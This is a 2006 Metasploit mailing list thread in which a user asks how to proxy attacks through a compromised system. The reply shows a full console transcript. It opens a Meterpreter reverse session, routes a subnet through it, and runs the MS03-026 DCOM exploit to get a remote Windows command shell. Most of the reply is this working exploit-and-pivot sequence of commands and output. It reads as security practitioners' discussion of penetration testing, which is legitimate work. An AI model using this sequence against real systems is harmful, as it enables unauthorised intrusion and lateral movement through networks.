Metasploit mailing list archives

staging attack proxy


From: cbyrd01 at gmail.com (Chris Byrd)
Date: Fri, 10 Nov 2006 10:03:24 -0600

What you are looking for is the meterpreter payload.  Once a system
has meterpreter on it, you should be able to route future exploits
through it using the route command.  Here's a sample previously posted
by mmiller:

msf exploit(aggressive) > exploit -z
[*] Started reverse handler
[*] Sending 239 byte payload...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.142.43.3:5555 -> 10.142.43.2:3008)
[*] Session 1 created in the background.
msf exploit(aggressive) > route add 192.168.37.0 255.255.255.0 1
msf exploit(aggressive) > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (10.142.43.3:5555 -> 10.142.43.2:3011)
[*] The DCERPC service did not reply to our request

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

I've had problems getting this to work myself, but I haven't tried it
with the more recent versions.  If you try it out, please let me know
(or post on list) as to your results.

Thanks!

Chris

On 11/10/06, Valter Santos <vsantola at gmail.com> wrote:
Folks,

Is there any support for staging attack proxies on Metasploit (v2.7 or
v3.0)? Searching the docs I don't see anything.

What I mean by this is whether it is possible to upload a
"metasploit agent" to a compromised system and proxy attacks through it
(much in the manner of level1 agents on Core Impact). I think I read
something about this for Metasploit, but cannot find any info.

cheers,
/valter

--
o Valter Santos
o Security Analyst
o INFOCON Tactical Overview: http://infocon.sectoid.com
o PGP: 0xE2A4B206
o ..
o Attack is the secret of defense; defense is the planning of an attack.
o Sun Tzu, Art of War



